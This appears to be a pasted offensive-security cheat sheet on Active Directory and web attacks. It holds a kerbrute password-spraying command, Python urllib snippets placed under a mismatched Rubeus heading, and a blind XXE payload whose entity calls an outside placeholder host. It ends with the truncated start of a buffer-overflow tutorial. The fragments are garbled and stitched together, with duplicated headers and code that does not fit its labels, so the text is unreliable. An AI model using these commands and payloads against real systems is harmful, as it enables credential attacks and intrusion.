Note: I did not author this; I found it somewhere.
- Tools
- Most common paths to AD compromise
- GPO - Pivoting with Local Admin
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
import urllib.request
import urllib.response
userName = "user"
passWord = "password"
top_level_url = "http://127.0.0.1/api/update"
# create an authorization handler
p = urllib.request.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, top_level_url, userName, passWord)
#!/usr/bin/env python
#
# Tested with Python 3.4.3 on Windows 8.1
# Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32
# If you need to access a web site/service via a proxy, set http_proxy or https_proxy.
# https://docs.python.org/3/library/urllib.request.html#urllib.request.ProxyHandler
# set http_proxy=http://127.0.0.1:8888/
# set https_proxy=https://127.0.0.1:8888/
#!/usr/bin/env python
#
# I tested this with Python 3.4.3 on Windows 8.1
# Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32
import urllib.request
import getpass
# If you access the URL below via a proxy,
# set the environment variable 'http_proxy' before executing this.
--------------------------------------------------------------
Vanilla, used to verify outbound XXE or blind XXE
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
This tutorial is based on the Computerphile video made by Dr. Mike Pound:
https://www.youtube.com/watch?v=1S0aBV-Waeo
The tutorial will show you how to trigger and exploit a buffer overflow in a custom C program, using Kali Linux 32-bit PAE 2016.1.
Torrent Link: https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vbox-i686.torrent